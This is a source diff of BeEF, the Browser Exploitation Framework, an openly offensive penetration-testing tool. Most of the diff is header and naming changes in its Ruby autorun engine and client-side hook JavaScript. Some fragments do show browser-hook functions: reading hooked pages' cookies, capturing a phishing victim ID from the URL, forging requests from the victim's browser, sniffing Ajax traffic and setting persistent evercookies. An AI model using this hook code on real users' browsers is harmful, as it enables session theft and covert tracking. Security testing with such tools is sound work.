#
module BeEF
@@ -14,204 +14,76 @@ module BeEF
@debug_on = @config.get('beef.debug')
end
# Load an ARE rule set
# @param [Hash] ARE ruleset as JSON
# @return [Hash] {"success": Boolean, "rule_id": Integer, "error": String}
def load_rule_json(data)
name = data['name'] || ''
author = data['author'] || ''
# this expects parsed JSON as input
def load(data)
name = data['name']
author = data['author']
browser = data['browser'] || 'ALL'
browser_version = data['browser_version'] || 'ALL'
os = data['os'] || 'ALL'
os_version = data['os_version'] || 'ALL'
modules = data['modules']
execution_order = data['execution_order']
execution_delay = data['execution_delay']
chain_mode = data['chain_mode'] || 'sequential'
exec_order = data['execution_order']
exec_delay = data['execution_delay']
chain_mode = data['chain_mode']
begin
BeEF::Core::AutorunEngine::Parser.instance.parse(
name,
author,
browser,
browser_version,
os,
os_version,
modules,
execution_order,
execution_delay,
chain_mode
)
rescue => e
print_error("[ARE] Error loading ruleset (#{name}): #{e.message}")
return { 'success' => false, 'error' => e.message }
end
existing_rule = BeEF::Core::Models::Rule.where(
name: name,
author: author,
browser: browser,
browser_version: browser_version,
os: os,
os_version: os_version,
modules: modules.to_json,
execution_order: execution_order.to_s,
execution_delay: execution_delay.to_s,
chain_mode: chain_mode
).first
unless existing_rule.nil?
msg = "Duplicate rule already exists in the database (ID: #{existing_rule.id})"
print_info("[ARE] Skipping ruleset (#{name}): #{msg}")
return { 'success' => false, 'error' => msg }
end
are_rule = BeEF::Core::Models::Rule.new(
name: name,
author: author,
browser: browser,
browser_version: browser_version,
os: os,
os_version: os_version,
modules: modules.to_json,
execution_order: execution_order.to_s,
execution_delay: execution_delay.to_s,
chain_mode: chain_mode
)
are_rule.save
print_info("[ARE] Ruleset (#{name}) parsed and stored successfully.")
if @debug_on
print_more "Target Browser: #{browser} (#{browser_version})"
print_more "Target OS: #{os} (#{os_version})"
print_more 'Modules to run:'
modules.each do |mod|
print_more "(*) Name: #{mod['name']}"
print_more "(*) Condition: #{mod['condition']}"
print_more "(*) Code: #{mod['code']}"
print_more '(*) Options:'
mod['options'].each do |key, value|
print_more "\t#{key}: (#{value})"
end
end
print_more "Exec order: #{execution_order}"
print_more "Exec delay: #{exec_delay}"
end
{ 'success' => true, 'rule_id' => are_rule.id }
rescue TypeError, ArgumentError => e
print_error("[ARE] Failed to load ruleset (#{name}): #{e.message}")
{ 'success' => false, 'error' => e.message }
end
# Update an ARE rule set.
# @param [Hash] ARE rule ID.
# @param [Hash] ARE ruleset as JSON
# @return [Hash] {"success": Boolean, "rule_id": Integer, "error": String}
def update_rule_json(id, data)
# Quite similar in implementation to load_rule_json. Might benefit from a refactor.
name = data['name'] || ''
author = data['author'] || ''
browser = data['browser'] || 'ALL'
browser_version = data['browser_version'] || 'ALL'
os = data['os'] || 'ALL'
os_version = data['os_version'] || 'ALL'
modules = data['modules']
execution_order = data['execution_order']
execution_delay = data['execution_delay']
chain_mode = data['chain_mode'] || 'sequential'
begin
BeEF::Core::AutorunEngine::Parser.instance.parse(
name,
author,
browser,
browser_version,
os,
os_version,
modules,
execution_order,
execution_delay,
chain_mode
)
rescue => e
print_error("[ARE] Error updating ruleset (#{name}): #{e.message}")
return { 'success' => false, 'error' => e.message }
end
existing_rule = BeEF::Core::Models::Rule.where(
name: name,
author: author,
browser: browser,
browser_version: browser_version,
os: os,
os_version: os_version,
modules: modules.to_json,
execution_order: execution_order.to_s,
execution_delay: execution_delay.to_s,
chain_mode: chain_mode
).first
unless existing_rule.nil?
msg = "Duplicate rule already exists in the database (ID: #{existing_rule.id})"
print_info("[ARE] Skipping ruleset (#{name}): #{msg}")
return { 'success' => false, 'error' => msg }
end
old_are_rule = BeEF::Core::Models::Rule.find_by(id: id)
old_are_rule.update(
name: name,
author: author,
browser: browser,
browser_version: browser_version,
os: os,
os_version: os_version,
modules: modules.to_json,
execution_order: execution_order.to_s,
execution_delay: execution_delay.to_s,
chain_mode: chain_mode
parser_result = BeEF::Core::AutorunEngine::Parser.instance.parse(
name, author, browser, browser_version, os, os_version, modules, exec_order, exec_delay, chain_mode
)
print_info("[ARE] Ruleset (#{name}) updated successfully.")
if @debug_on
print_more "Target Browser: #{browser} (#{browser_version})"
print_more "Target OS: #{os} (#{os_version})"
print_more 'Modules to run:'
modules.each do |mod|
print_more "(*) Name: #{mod['name']}"
print_more "(*) Condition: #{mod['condition']}"
print_more "(*) Code: #{mod['code']}"
print_more '(*) Options:'
mod['options'].each do |key, value|
print_more "\t#{key}: (#{value})"
if parser_result.length == 1 && parser_result.first
print_info "[ARE] Ruleset (#{name}) parsed and stored successfully."
if @debug_on
print_more "Target Browser: #{browser} (#{browser_version})"
print_more "Target OS: #{os} (#{os_version})"
print_more 'Modules to Trigger:'
modules.each do |mod|
print_more "(*) Name: #{mod['name']}"
print_more "(*) Condition: #{mod['condition']}"
print_more "(*) Code: #{mod['code']}"
print_more '(*) Options:'
mod['options'].each do |key, value|
print_more "\t#{key}: (#{value})"
end
end
print_more "Exec order: #{exec_order}"
print_more "Exec delay: #{exec_delay}"
end
print_more "Exec order: #{execution_order}"
print_more "Exec delay: #{exec_delay}"
are_rule = BeEF::Core::Models::Rule.new(
name: name,
author: author,
browser: browser,
browser_version: browser_version,
os: os,
os_version: os_version,
modules: modules.to_json,
execution_order: exec_order,
execution_delay: exec_delay,
chain_mode: chain_mode
)
are_rule.save
{ 'success' => true, 'rule_id' => are_rule.id }
else
print_error "[ARE] Ruleset (#{name}): ERROR. " + parser_result.last
{ 'success' => false, 'error' => parser_result.last }
end
{ 'success' => true }
rescue TypeError, ArgumentError => e
print_error("[ARE] Failed to update ruleset (#{name}): #{e.message}")
{ 'success' => false, 'error' => e.message }
rescue StandardError => e
err = 'Malformed JSON ruleset.'
print_error "[ARE] Ruleset (#{name}): ERROR. #{e} #{e.backtrace}"
{ 'success' => false, 'error' => err }
end
# Load an ARE ruleset from file
# @param [String] JSON ARE ruleset file path
def load_rule_file(json_rule_path)
def load_file(json_rule_path)
rule_file = File.open(json_rule_path, 'r:UTF-8', &:read)
self.load_rule_json(JSON.parse(rule_file))
rescue => e
print_error("[ARE] Failed to load ruleset from #{json_rule_path}: #{e.message}")
self.load JSON.parse(rule_file)
rescue StandardError => e
print_error "[ARE] Failed to load ruleset from #{json_rule_path}: #{e.message}"
end
# Load all JSON ARE rule files from arerules/enabled/ directory
def load_directory
Dir.glob("#{$root_dir}/arerules/enabled/**/*.json") do |rule_file|
print_debug("[ARE] Processing ruleset file: #{rule_file}")
load_rule_file(rule_file)
Dir.glob("#{$root_dir}/arerules/enabled/**/*.json") do |rule|
print_debug "[ARE] Processing rule: #{rule}"
load_file rule
end
end
end

4
core/main/client/are.js
View File

@@ -1,6 +1,6 @@
//
// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

4
core/main/client/beef.js
View File

@@ -1,6 +1,6 @@
//
// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

66
core/main/client/browser.js
View File

@@ -1,6 +1,6 @@
//
// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
@@ -944,25 +944,14 @@ beef.browser = {
*/
isFF99: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && (this.getProtocol() == "https:" ? typeof navigator.mozGetUserMedia != "undefined" : true) && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/99./) != null;
},
/**
* Returns true if the browser is any version of Firefox.
* @example: beef.browser.isFFbowser()
*/
isFFbowser: function () {
const parser = bowser.getParser(navigator.userAgent);
const browserName = parser.getBrowserName();
return browserName == 'Firefox';
},
/**
* Returns true if the browser is any version of Firefox.
* Returns true if FF.
* @example: beef.browser.isFF()
*/
isFF: function () {
var legacyCheck = this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20() || this.isFF21() || this.isFF22() || this.isFF23() || this.isFF24() || this.isFF25() || this.isFF26() || this.isFF27() || this.isFF28() || this.isFF29() || this.isFF30() || this.isFF31() || this.isFF32() || this.isFF33() || this.isFF34() || this.isFF35() || this.isFF36() || this.isFF37() || this.isFF38() || this.isFF39() || this.isFF40() || this.isFF41() || this.isFF42() || this.isFF43() || this.isFF44() || this.isFF45() || this.isFF46() || this.isFF47() || this.isFF48() || this.isFF49() || this.isFF50() || this.isFF51() || this.isFF52() || this.isFF53() || this.isFF54() || this.isFF55() || this.isFF56() || this.isFF57() || this.isFF58()|| this.isFF59() || this.isFF60() || this.isFF61() || this.isFF62() || this.isFF63() || this.isFF64() || this.isFF65() || this.isFF66() || this.isFF67() || this.isFF68() || this.isFF69() || this.isFF70() || this.isFF71() || this.isFF72() || this.isFF73() || this.isFF74() || this.isFF75() || this.isFF76() || this.isFF77() || this.isFF78() || this.isFF79() || this.isFF80() || this.isFF81() || this.isFF82() || this.isFF83() || this.isFF84() || this.isFF85() || this.isFF86() || this.isFF87() || this.isFF88() || this.isFF89() || this.isFF90() || this.isFF91() || this.isFF92() || this.isFF93() || this.isFF94() || this.isFF95() || this.isFF96() || this.isFF97() || this.isFF98() || this.isFF99();
return legacyCheck || this.isFFbowser();
return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20() || this.isFF21() || this.isFF22() || this.isFF23() || this.isFF24() || this.isFF25() || this.isFF26() || this.isFF27() || this.isFF28() || this.isFF29() || this.isFF30() || this.isFF31() || this.isFF32() || this.isFF33() || this.isFF34() || this.isFF35() || this.isFF36() || this.isFF37() || this.isFF38() || this.isFF39() || this.isFF40() || this.isFF41() || this.isFF42() || this.isFF43() || this.isFF44() || this.isFF45() || this.isFF46() || this.isFF47() || this.isFF48() || this.isFF49() || this.isFF50() || this.isFF51() || this.isFF52() || this.isFF53() || this.isFF54() || this.isFF55() || this.isFF56() || this.isFF57() || this.isFF58()|| this.isFF59() || this.isFF60() || this.isFF61() || this.isFF62() || this.isFF63() || this.isFF64() || this.isFF65() || this.isFF66() || this.isFF67() || this.isFF68() || this.isFF69() || this.isFF70() || this.isFF71() || this.isFF72() || this.isFF73() || this.isFF74() || this.isFF75() || this.isFF76() || this.isFF77() || this.isFF78() || this.isFF79() || this.isFF80() || this.isFF81() || this.isFF82() || this.isFF83() || this.isFF84() || this.isFF85() || this.isFF86() || this.isFF87() || this.isFF88() || this.isFF89() || this.isFF90() || this.isFF91() || this.isFF92() || this.isFF93() || this.isFF94() || this.isFF95() || this.isFF96() || this.isFF97() || this.isFF98() || this.isFF99();
},
/**
@@ -2449,23 +2438,12 @@ beef.browser = {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 99) ? true : false);
},
/**
* Returns true for modern versions of Chrome (above 9).
* @example: beef.browser.isCbowser()
*/
isCbowser: function () {
const parser = bowser.getParser(navigator.userAgent);
const browserName = parser.getBrowserName();
return browserName == 'Chrome';
},
/**
* Returns true if Chrome.
* @example: beef.browser.isC()
*/
isC: function () {
var legacyCheck = this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC19iOS() || this.isC20() || this.isC20iOS() || this.isC21() || this.isC21iOS() || this.isC22() || this.isC22iOS() || this.isC23() || this.isC23iOS() || this.isC24() || this.isC24iOS() || this.isC25() || this.isC25iOS() || this.isC26() || this.isC26iOS() || this.isC27() || this.isC27iOS() || this.isC28() || this.isC28iOS() || this.isC29() || this.isC29iOS() || this.isC30() || this.isC30iOS() || this.isC31() || this.isC31iOS() || this.isC32() || this.isC32iOS() || this.isC33() || this.isC33iOS() || this.isC34() || this.isC34iOS() || this.isC35() || this.isC35iOS() || this.isC36() || this.isC36iOS() || this.isC37() || this.isC37iOS() || this.isC38() || this.isC38iOS() || this.isC39() || this.isC39iOS() || this.isC40() || this.isC40iOS() || this.isC41() || this.isC41iOS() || this.isC42() || this.isC42iOS() || this.isC43() || this.isC43iOS() || this.isC44() || this.isC44iOS() || this.isC45() || this.isC45iOS() || this.isC46() || this.isC46iOS() || this.isC47() || this.isC47iOS() || this.isC48() || this.isC48iOS() || this.isC49() || this.isC49iOS() || this.isC50() || this.isC50iOS() || this.isC51() || this.isC51iOS() || this.isC52() || this.isC52iOS() || this.isC53() || this.isC53iOS() || this.isC54() || this.isC54iOS() || this.isC55() || this.isC55iOS() || this.isC56() || this.isC56iOS() || this.isC57() || this.isC57iOS() || this.isC58() || this.isC58iOS() || this.isC59() || this.isC59iOS()|| this.isC60() || this.isC60iOS()|| this.isC61() || this.isC61iOS()|| this.isC62() || this.isC62iOS()|| this.isC63() || this.isC63iOS()|| this.isC64() || this.isC64iOS()|| this.isC65() || this.isC65iOS()|| this.isC66() || this.isC66iOS()|| this.isC67() || this.isC67iOS()|| this.isC68() || this.isC68iOS()|| this.isC69() || this.isC69iOS()|| this.isC70() || this.isC70iOS()|| this.isC71() || this.isC71iOS()|| this.isC72() || this.isC72iOS()|| this.isC73() || this.isC73iOS()|| this.isC74() || this.isC74iOS()|| this.isC75() || this.isC75iOS()|| this.isC76() || this.isC76iOS()|| this.isC77() || this.isC77iOS()|| this.isC78() || this.isC78iOS()|| this.isC79() || this.isC79iOS()|| this.isC80() || this.isC80iOS()|| this.isC81() || this.isC81iOS()|| this.isC82() || this.isC82iOS()|| this.isC83() || this.isC83iOS()|| this.isC84() || this.isC84iOS()|| this.isC85() || this.isC85iOS()|| this.isC86() || this.isC86iOS()|| this.isC87() || this.isC87iOS()|| this.isC88() || this.isC88iOS()|| this.isC89() || this.isC89iOS()|| this.isC90() || this.isC90iOS()|| this.isC91() || this.isC91iOS()|| this.isC92() || this.isC92iOS()|| this.isC93() || this.isC93iOS()|| this.isC94() || this.isC94iOS()|| this.isC95() || this.isC95iOS()|| this.isC96() || this.isC96iOS()|| this.isC97() || this.isC97iOS()|| this.isC98() || this.isC98iOS()|| this.isC99() || this.isC99iOS();
return legacyCheck || this.isCbowser();
return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC19iOS() || this.isC20() || this.isC20iOS() || this.isC21() || this.isC21iOS() || this.isC22() || this.isC22iOS() || this.isC23() || this.isC23iOS() || this.isC24() || this.isC24iOS() || this.isC25() || this.isC25iOS() || this.isC26() || this.isC26iOS() || this.isC27() || this.isC27iOS() || this.isC28() || this.isC28iOS() || this.isC29() || this.isC29iOS() || this.isC30() || this.isC30iOS() || this.isC31() || this.isC31iOS() || this.isC32() || this.isC32iOS() || this.isC33() || this.isC33iOS() || this.isC34() || this.isC34iOS() || this.isC35() || this.isC35iOS() || this.isC36() || this.isC36iOS() || this.isC37() || this.isC37iOS() || this.isC38() || this.isC38iOS() || this.isC39() || this.isC39iOS() || this.isC40() || this.isC40iOS() || this.isC41() || this.isC41iOS() || this.isC42() || this.isC42iOS() || this.isC43() || this.isC43iOS() || this.isC44() || this.isC44iOS() || this.isC45() || this.isC45iOS() || this.isC46() || this.isC46iOS() || this.isC47() || this.isC47iOS() || this.isC48() || this.isC48iOS() || this.isC49() || this.isC49iOS() || this.isC50() || this.isC50iOS() || this.isC51() || this.isC51iOS() || this.isC52() || this.isC52iOS() || this.isC53() || this.isC53iOS() || this.isC54() || this.isC54iOS() || this.isC55() || this.isC55iOS() || this.isC56() || this.isC56iOS() || this.isC57() || this.isC57iOS() || this.isC58() || this.isC58iOS() || this.isC59() || this.isC59iOS()|| this.isC60() || this.isC60iOS()|| this.isC61() || this.isC61iOS()|| this.isC62() || this.isC62iOS()|| this.isC63() || this.isC63iOS()|| this.isC64() || this.isC64iOS()|| this.isC65() || this.isC65iOS()|| this.isC66() || this.isC66iOS()|| this.isC67() || this.isC67iOS()|| this.isC68() || this.isC68iOS()|| this.isC69() || this.isC69iOS()|| this.isC70() || this.isC70iOS()|| this.isC71() || this.isC71iOS()|| this.isC72() || this.isC72iOS()|| this.isC73() || this.isC73iOS()|| this.isC74() || this.isC74iOS()|| this.isC75() || this.isC75iOS()|| this.isC76() || this.isC76iOS()|| this.isC77() || this.isC77iOS()|| this.isC78() || this.isC78iOS()|| this.isC79() || this.isC79iOS()|| this.isC80() || this.isC80iOS()|| this.isC81() || this.isC81iOS()|| this.isC82() || this.isC82iOS()|| this.isC83() || this.isC83iOS()|| this.isC84() || this.isC84iOS()|| this.isC85() || this.isC85iOS()|| this.isC86() || this.isC86iOS()|| this.isC87() || this.isC87iOS()|| this.isC88() || this.isC88iOS()|| this.isC89() || this.isC89iOS()|| this.isC90() || this.isC90iOS()|| this.isC91() || this.isC91iOS()|| this.isC92() || this.isC92iOS()|| this.isC93() || this.isC93iOS()|| this.isC94() || this.isC94iOS()|| this.isC95() || this.isC95iOS()|| this.isC96() || this.isC96iOS()|| this.isC97() || this.isC97iOS()|| this.isC98() || this.isC98iOS()|| this.isC99() || this.isC99iOS();
},
/**
@@ -2508,23 +2486,12 @@ beef.browser = {
return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.80.*Version\/12\./) != null));
},
/**
* Returns true if the browser is any version of Opera.
* @example: beef.browser.isObowser()
*/
isObowser: function () {
const parser = bowser.getParser(navigator.userAgent);
const browserName = parser.getBrowserName();
return browserName == 'Opera';
},
/**
* Returns true if Opera.
* @example: beef.browser.isO()
*/
isO: function () {
var legacyCheck = this.isO9_52() || this.isO9_60() || this.isO10() || this.isO11() || this.isO12();
return legacyCheck || this.isObowser();
return this.isO9_52() || this.isO9_60() || this.isO10() || this.isO11() || this.isO12();
},
/**
@@ -4298,6 +4265,9 @@ beef.browser = {
try {
var cookies = document.cookie;
/* Never stop the madness dear C.
* var veglol = beef.browser.cookie.veganLol();
*/
if (cookies) details['browser.window.cookies'] = cookies;
} catch (e) {
beef.debug("Cookies can't be read. The hooked origin is most probably using HttpOnly.");
@@ -4361,6 +4331,24 @@ beef.browser = {
if (has_wmp) details['browser.capabilities.wmp'] = has_wmp;
if (has_vlc) details['browser.capabilities.vlc'] = has_vlc;
var pf_integration = "<%= @phishing_frenzy_enable %>";
if (pf_integration) {
var pf_param = "uid";
var pf_victim_uid = "";
var location_search = window.location.search.substring(1);
var params = location_search.split('&');
for (var i = 0; i < params.length; i++) {
var param_entry = params[i].split('=');
if (param_entry[0] == pf_param) {
pf_victim_uid = param_entry[1];
details['PhishingFrenzyUID'] = pf_victim_uid;
break;
}
}
} else {
details['PhishingFrenzyUID'] = "N/A";
}
return details;
},

10
core/main/client/browser/cookie.js
View File

@@ -1,6 +1,6 @@
//
// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
@@ -72,7 +72,7 @@ beef.browser.cookie = {
},
/** @memberof beef.browser.cookie */
cookieValueRandomizer: function (){
veganLol: function (){
var to_hell= '';
var min = 17;
var max = 25;
@@ -100,7 +100,7 @@ beef.browser.cookie = {
},
/** @memberof beef.browser.cookie */
hasSessionCookies: function (name){
this.setCookie( name, beef.browser.cookie.cookieValueRandomizer(), '', '/', '', '' );
this.setCookie( name, beef.browser.cookie.veganLol(), '', '/', '', '' );
cookiesEnabled = (this.getCookie(name) == null)? false:true;
this.deleteCookie(name, '/', '');
@@ -109,7 +109,7 @@ beef.browser.cookie = {
},
/** @memberof beef.browser.cookie */
hasPersistentCookies: function (name){
this.setCookie( name, beef.browser.cookie.cookieValueRandomizer(), 1, '/', '', '' );
this.setCookie( name, beef.browser.cookie.veganLol(), 1, '/', '', '' );
cookiesEnabled = (this.getCookie(name) == null)? false:true;
this.deleteCookie(name, '/', '');

4
core/main/client/browser/popup.js
View File

@@ -1,6 +1,6 @@
//
// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

4
core/main/client/dom.js
View File

@@ -1,6 +1,6 @@
//
// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

4
core/main/client/encode/base64.js
View File

@@ -1,6 +1,6 @@
//
// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

4
core/main/client/encode/json.js
View File

@@ -1,6 +1,6 @@
//
// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

4
core/main/client/geolocation.js
View File

@@ -1,6 +1,6 @@
//
// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

4
core/main/client/hardware.js
View File

@@ -1,6 +1,6 @@
//
// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

4
core/main/client/init.js
View File

@@ -1,6 +1,6 @@
//
// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

7
core/main/client/lib/bowser-2.11.0.min.js vendored
View File

File diff suppressed because one or more lines are too long

1547
core/main/client/lib/browser_jools.js Normal file
View File

File diff suppressed because it is too large Load Diff

1295
core/main/client/lib/deployJava.js Normal file
View File

File diff suppressed because it is too large Load Diff

8
core/main/client/lib/evercookie.js
View File

@@ -1,6 +1,6 @@
//
// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
@@ -31,7 +31,7 @@
* for example, if someone deletes all but one type of cookie, once
* that cookie is re-discovered, all of the other cookie types get reset
*
* !!! SOME OF THESE ARE CROSS-ORIGIN COOKIES, THIS MEANS
* !!! SOME OF THESE ARE CROSS-DOMAIN COOKIES, THIS MEANS
* OTHER SITES WILL BE ABLE TO READ SOME OF THESE COOKIES !!!
*
* USAGE:
@@ -803,7 +803,7 @@ this.evercookie_cookie = function(name, value)
else
return this.getFromStr(name, document.cookie);
}catch(e){
// the hooked origin is using HttpOnly, so we must set the hook ID in a different way.
// the hooked domain is using HttpOnly, so we must set the hook ID in a different way.
// evercookie_userdata and evercookie_window will be used in this case.
}
};

1
core/main/client/lib/jools.min.js vendored Normal file
View File

File diff suppressed because one or more lines are too long

4
core/main/client/logger.js
View File

@@ -1,6 +1,6 @@
//
// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

6
core/main/client/mitb.js
View File

@@ -1,6 +1,6 @@
//
// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
@@ -38,7 +38,7 @@ beef.mitb = {
if (method == "GET") {
//GET request -> cross-origin
if (url.indexOf(document.location.hostname) == -1 || (portR != null && requestPort != document.location.port )) {
beef.mitb.sniff("GET [Ajax CrossOrigin Request]: " + url);
beef.mitb.sniff("GET [Ajax CrossDomain Request]: " + url);
window.open(url);
}else { //GET request -> same-origin
beef.mitb.sniff("GET [Ajax Request]: " + url);

52
core/main/client/net.js
View File

@@ -1,6 +1,6 @@
//
// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
@@ -74,7 +74,7 @@ beef.net = {
this.status_text = null; // success, timeout, error, ...
this.response_body = null; // "<html>…." if not a cross-origin request
this.port_status = null; // tcp port is open, closed or not http
this.was_cross_origin = null; // true or false
this.was_cross_domain = null; // true or false
this.was_timedout = null; // the user specified timeout was reached
this.duration = null; // how long it took for the request to complete
this.headers = null; // full response headers
@@ -217,11 +217,11 @@ beef.net = {
* @return {Object} this object contains the response details
*/
request: function (scheme, method, domain, port, path, anchor, data, timeout, dataType, callback) {
//check if same origin or cross origin
var cross_origin = true;
//check if same domain or cross domain
var cross_domain = true;
if (document.domain == domain.replace(/(\r\n|\n|\r)/gm, "")) { //strip eventual line breaks
if (document.location.port == "" || document.location.port == null) {
cross_origin = !(port == "80" || port == "443");
cross_domain = !(port == "80" || port == "443");
}
}
@@ -238,12 +238,12 @@ beef.net = {
//define response object
var response = new this.response;
response.was_cross_origin = cross_origin;
response.was_cross_domain = cross_domain;
var start_time = new Date().getTime();
/*
* according to http://api.jquery.com/jQuery.ajax/, Note: having 'script':
* This will turn POSTs into GETs for cross origin requests.
* This will turn POSTs into GETs for remote-domain requests.
*/
if (method == "POST") {
$j.ajaxSetup({
@@ -310,7 +310,7 @@ beef.net = {
/**
* Similar to beef.net.request, except from a few things that are needed when dealing with forged requests:
* - requestid: needed on the callback
* - allowCrossOrigin: set cross-origin requests as allowed or blocked
* - allowCrossDomain: set cross-domain requests as allowed or blocked
*
* forge_request is used mainly by the Requester and Tunneling Proxy Extensions.
* Example usage:
@@ -318,20 +318,20 @@ beef.net = {
* true, null, { foo: "bar" }, 5, 'html', false, null, function(response) {
* alert(response.response_body)})
*/
forge_request: function (scheme, method, domain, port, path, anchor, headers, data, timeout, dataType, allowCrossOrigin, requestid, callback) {
forge_request: function (scheme, method, domain, port, path, anchor, headers, data, timeout, dataType, allowCrossDomain, requestid, callback) {
if (domain == "undefined" || path == "undefined") {
beef.debug("[beef.net.forge_request] Error: Malformed request. No host specified.");
return;
}
// check if same origin or cross origin
var cross_origin = true;
// check if same domain or cross domain
var cross_domain = true;
if (document.domain == domain && document.location.protocol == scheme + ':') {
if (document.location.port == "" || document.location.port == null) {
cross_origin = !(port == "80" || port == "443");
cross_domain = !(port == "80" || port == "443");
} else {
if (document.location.port == port) cross_origin = false;
if (document.location.port == port) cross_domain = false;
}
}
@@ -348,23 +348,23 @@ beef.net = {
// define response object
var response = new this.response;
response.was_cross_origin = cross_origin;
response.was_cross_domain = cross_domain;
var start_time = new Date().getTime();
// if cross-origin requests are not allowed and the request is cross-origin
// if cross-domain requests are not allowed and the request is cross-domain
// don't proceed and return
if (allowCrossOrigin == "false" && cross_origin) {
if (allowCrossDomain == "false" && cross_domain) {
beef.debug("[beef.net.forge_request] Error: Cross Domain Request. The request was not sent.");
response.status_code = -1;
response.status_text = "crossorigin";
response.port_status = "crossorigin";
response.status_text = "crossdomain";
response.port_status = "crossdomain";
response.response_body = "ERROR: Cross Domain Request. The request was not sent.\n";
response.headers = "ERROR: Cross Domain Request. The request was not sent.\n";
if (callback != null) callback(response, requestid);
return response;
}
// if the request was cross-origin from a HTTPS origin to HTTP
